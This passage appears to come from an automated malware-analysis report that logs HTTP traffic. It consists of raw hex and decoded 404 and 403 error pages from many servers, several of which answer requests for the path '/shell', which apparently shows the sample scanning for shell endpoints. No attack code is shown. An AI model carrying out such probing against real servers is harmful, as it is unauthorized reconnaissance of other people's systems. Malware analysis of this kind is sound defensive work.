0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 10:00:14 GMTServer: webCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:57 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 04:09:57 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:10:30 GMTContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css"><!--body{margin:0;font-size:.7em;font-family:Verdana, Arial,
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 345Date: Fri, 07 Aug 2020 21:28:23 GMTServer: lighttpd/1.4.39Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:02 GMTServer: Apache/2.2.31 (CentOS)Content-Length: 278Keep-Alive: timeout=10Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 33 31 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.31 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:05 GMTServer: Apache/2.4.25 (Debian) mod_fcgid/2.3.9 OpenSSL/1.0.2uContent-Length: 196Keep-Alive: timeout=60, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingX-Frame-Options: SAMEORIGINContent-Type: text/htmlX-Content-Type-Options: nosniffDate: Mon, 01 Nov 2021 10:12:17 GMTCache-Control: no-cacheContent-Length: 223X-XSS-Protection: 1; mode=blockConnection: Keep-AliveAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:10:05 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:10:05 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:10:01 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 01 Nov 2021 09:10:06 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:05 GMTServer: ApacheContent-Length: 203Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Oct 2021 12:37:23 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 179Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 73 68 65 6c 6c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /shell</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:02:58 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Thu, 15 Jan 1970 20:16:03 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A 